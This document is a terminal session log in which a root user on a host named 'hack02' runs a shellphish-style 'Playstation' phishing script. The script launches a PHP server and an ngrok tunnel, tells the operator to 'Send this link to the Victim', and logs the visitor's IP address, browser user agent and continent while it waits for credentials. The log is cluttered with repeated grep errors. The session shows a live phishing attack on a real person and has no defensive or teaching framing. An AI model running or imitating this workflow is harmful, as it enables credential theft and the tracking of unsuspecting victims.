Script started on 2020-07-18 05:13:52-11:00 [TERM="screen" TTY="/dev/pts/9" COLUMNS="80" LINES="24"]
root@hack02:~/bot# cd /root/bot/hacks/shellphish/; timeout 3800 ./Playstation1.sh; pkill -f -2 ngrok > /dev/null 2>&1; killall -2 ngrok > /dev/null 2>&1

[*] Starting php server...
[*] Starting ngrok server...
[*] Send this link to the Victim: https://f2f88d8e080d.ngrok.io

[*] Waiting IPs and Credentials, Press Ctrl + C to exit...


[*] IP Found!
[*] Target IP: 203.132.95.52
[*] User-Agent:	 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
[*] Saved: playstation/saved.ip.txt
grep: iptracker.log: No such file or directory

grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory

[*] Waiting Credentials and Next IP.

[*] IP Found!
[*] Target IP: 203.132.95.52
[*] Target IP: User-Agent:
[*] User-Agent:	 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0IP: 203.132.95.52
[*] User-Agent:	 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
[*] Saved: playstation/saved.ip.txt


[*] Waiting Credentials and Next IP.

[*] IP Found!
[*] Target IP: 203.132.95.52
[*] User-Agent:	 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
[*] Saved: playstation/saved.ip.txt

grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
[*] IP Continent: Oceania (OC)
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory
grep: iptracker.log: No such file or directory

[*] Waiting Credentials and Next IP.

